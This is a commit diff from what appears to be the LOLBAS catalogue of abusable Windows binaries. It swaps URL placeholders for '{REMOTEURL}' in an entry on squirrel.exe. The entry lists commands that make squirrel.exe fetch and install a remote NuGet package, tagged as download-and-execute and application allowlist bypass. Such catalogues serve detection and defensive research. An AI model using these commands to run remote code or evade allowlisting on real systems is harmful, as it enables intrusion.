Generalising file paths and urls, see #10 (#422)

This commit is contained in:
Wietze
2025-01-28 11:15:01 +00:00
committed by GitHub
parent e62749f81a
commit a79893e7ad
196 changed files with 555 additions and 758 deletions

View File

@@ -4,14 +4,14 @@ Description: Binary to update the existing installed Nuget/squirrel package. Par
Author: 'Reegun J (OCBC Bank) - @reegun21'
Created: 2019-06-26
Commands:
- Command: squirrel.exe --download [url to package]
- Command: squirrel.exe --download {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file and download the nuget package.
Usecase: Download binary
Category: Download
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: squirrel.exe --update [url to package]
- Command: squirrel.exe --update {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -21,7 +21,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --update [url to package]
- Command: squirrel.exe --update {REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute
@@ -31,7 +31,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
- Command: squirrel.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: AWL Bypass
@@ -41,7 +41,7 @@ Commands:
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package]
- Command: squirrel.exe --updateRollback={REMOTEURL}
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary
Category: Execute